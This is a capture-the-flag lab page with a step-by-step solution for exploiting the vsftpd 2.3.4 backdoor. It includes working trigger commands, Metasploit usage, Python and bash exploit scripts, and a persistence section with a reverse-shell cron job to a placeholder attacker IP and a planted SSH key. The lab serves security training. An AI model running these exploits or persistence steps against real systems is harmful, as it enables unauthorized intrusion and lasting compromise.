Labs / Anonymous 2
- Easy
- Released 01 May 2024
🔓 Can you exploit the hidden backdoor in this FTP server?
A seemingly innocent FTP server harbors a dark secret - a malicious backdoor inserted by attackers who compromised the official distribution. The vulnerability lies dormant, waiting for the right trigger to unleash remote access. 🎯 Time to discover how compromised software can become your gateway to system control!
1
Flags
10
Points
Easy
Solution Available
Free Access
Start Lab Environment
Launch your dedicated AWS machine to begin hacking
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Easy
🔓 Anonymous FTP 2 - Complete Backdoor Exploitation Solution
Objective: Exploit the vsftpd 2.3.4 backdoor vulnerability to gain remote shell access and retrieve the flag from the target system.
🔍 Step 1: Service Discovery and Enumeration
Begin by scanning the target to identify running services:
# Nmap service scan
nmap -Pn -sV -p21,6200 <target-ip>
# Expected output:
# 21/tcp open ftp vsftpd 2.3.4
# 6200/tcp filtered unknownThe scan reveals vsftpd 2.3.4 running on port 21. Port 6200 may appear filtered initially but becomes important later.
🔍 Step 2: Understanding the vsftpd 2.3.4 Backdoor
The vsftpd 2.3.4 backdoor was inserted by attackers who compromised the official distribution in July 2011. The backdoor is triggered when a username containing the string ":)" is used during FTP authentication.
Backdoor Mechanism:
• When username contains ":)", the backdoor activates
• Opens a shell listener on port 6200
• Provides direct system access without authentication
• The backdoor code is in sysdeputil.c (vsf_sysutil_extra function)
• When username contains ":)", the backdoor activates
• Opens a shell listener on port 6200
• Provides direct system access without authentication
• The backdoor code is in sysdeputil.c (vsf_sysutil_extra function)
🔍 Step 3: Triggering the Backdoor
Connect to the FTP service and trigger the backdoor using a malicious username:
Using FTP Client
# Connect to FTP service
ftp <target-ip>
# When prompted for username:
Username: user:)
Password: anything
# The login will fail, but backdoor activatesUsing Telnet
# Connect via telnet
telnet <target-ip> 21
# Send FTP commands:
USER user:)
PASS anything
# Connection may close, but backdoor is active🔍 Step 4: Connecting to the Backdoor Shell
After triggering the backdoor, connect to the shell listener on port 6200:
Backdoor Shell Access:
or
telnet <target-ip> 6200or
nc <target-ip> 6200You should now have a shell prompt with system access.
🔍 Step 5: System Exploration and Flag Retrieval
Once connected to the backdoor shell, explore the system to locate the flag:
# Check current directory
pwd
# List files in current directory
ls -la
# Look for flag in common locations
find / -name "flag*" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -i flag
# Check root directory
ls -la /root/
# Read the flag
cat /root/flag.txt🔍 Step 6: Alternative Exploitation Methods
Using Metasploit
# Start Metasploit
msfconsole
# Use the exploit module
use exploit/unix/ftp/vsftpd_234_backdoor
# Set target
set RHOSTS <target-ip>
# Run exploit
exploit
# Get shell session
sessions -i 1Python Script
# Create exploit script
import socket
# Trigger backdoor
s = socket.socket()
s.connect(('<target-ip>', 21))
s.send(b'USER user:)\r\n')
s.send(b'PASS pass\r\n')
s.close()
# Connect to shell
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))Manual Verification
# Check if backdoor is active
nmap -Pn -p6200 <target-ip>
# Should show port 6200 as open
# after triggering the backdoor
# Connect immediately
nc <target-ip> 6200🔍 Step 7: Understanding the Vulnerability Code
The backdoor code in sysdeputil.c shows how the vulnerability works:
# Trigger detection in str.c:
if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29))
{
vsf_sysutil_extra(); // Calls backdoor function
}
# Backdoor function in sysdeputil.c:
int vsf_sysutil_extra(void)
{
int fd, rfd;
struct sockaddr_in sa;
// Creates socket on port 6200
sa.sin_port = htons(6200);
// Binds and listens
// Accepts connections and spawns shell
execl("/bin/sh","sh",(char *)0);
}🔍 Step 8: Exploitation Timeline
- Connect to FTP: Establish connection to port 21
- Send Malicious Username: Use username containing ":)"
- Backdoor Activation: Server processes trigger and opens port 6200
- Shell Access: Connect to port 6200 for direct shell access
- Flag Retrieval: Navigate filesystem and locate flag file
🔍 Step 9: Common Troubleshooting
| Issue | Cause | Solution |
|---|---|---|
| Port 6200 not opening | Backdoor not triggered | Ensure username contains ":)" exactly |
| Connection refused on 6200 | Timing issue | Wait a few seconds after FTP login attempt |
| Shell not responsive | Connection timeout | Try multiple connection attempts |
| FTP login succeeds | Wrong vsftpd version | Verify target is running vsftpd 2.3.4 |
🔍 Step 10: Advanced Techniques
Automated Exploitation
# Bash one-liner
(echo 'USER user:)'; echo 'PASS pass'; sleep 2) | nc <target-ip> 21 && nc <target-ip> 6200
# Python automation
#!/usr/bin/env python3
import socket, time
s = socket.socket()
s.connect(('<target-ip>', 21))
s.send(b'USER user:)\r\n')
s.send(b'PASS pass\r\n')
s.close()
time.sleep(2)
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))Persistence Techniques
# Once in shell, establish persistence
echo 'nc -e /bin/sh <attacker-ip> 4444' > /tmp/backdoor.sh
chmod +x /tmp/backdoor.sh
# Add to crontab
echo '* * * * * /tmp/backdoor.sh' | crontab -
# Or create SSH key
mkdir -p ~/.ssh
echo 'ssh-rsa AAAA...' > ~/.ssh/authorized_keys🔍 Step 11: Flag Location and Extraction
The flag is typically located in the root directory:
Flag Extraction Commands:
# Navigate to root directory
cd /root
# List files
ls -la
# Read flag file
cat flag.txt
# Alternative search
find / -name "flag.txt" 2>/dev/null
cat $(find / -name "flag.txt" 2>/dev/null)🔍 Step 12: Security Implications
This vulnerability demonstrates several critical security concepts:
- Supply Chain Attacks: Compromised software distributions
- Backdoor Persistence: Hidden access mechanisms in legitimate software
- Network Service Exploitation: Leveraging service vulnerabilities for system access
- Post-Exploitation: System exploration and data exfiltration
- Detection Evasion: Backdoors designed to appear as normal functionality
🔍 Step 13: Remediation and Prevention
To prevent similar vulnerabilities:
- Software Verification: Verify checksums and digital signatures
- Source Code Auditing: Regular security code reviews
- Network Monitoring: Monitor for unusual network connections
- Patch Management: Keep software updated from trusted sources
- Intrusion Detection: Deploy IDS/IPS to detect exploitation attempts
- Least Privilege: Run services with minimal required privileges
Historical Context: The vsftpd 2.3.4 backdoor was discovered in July 2011 and represents one of the most well-known examples of a compromised software distribution. The backdoor was inserted by attackers who gained access to the official download site.
Flag Retrieval: After successfully exploiting the backdoor and gaining shell access, the flag can be found in /root/flag.txt and should be submitted to complete the challenge.
Real-World Application: This challenge demonstrates realistic exploitation techniques used in penetration testing and red team exercises. The vsftpd backdoor remains a common target in CTF competitions and security training scenarios.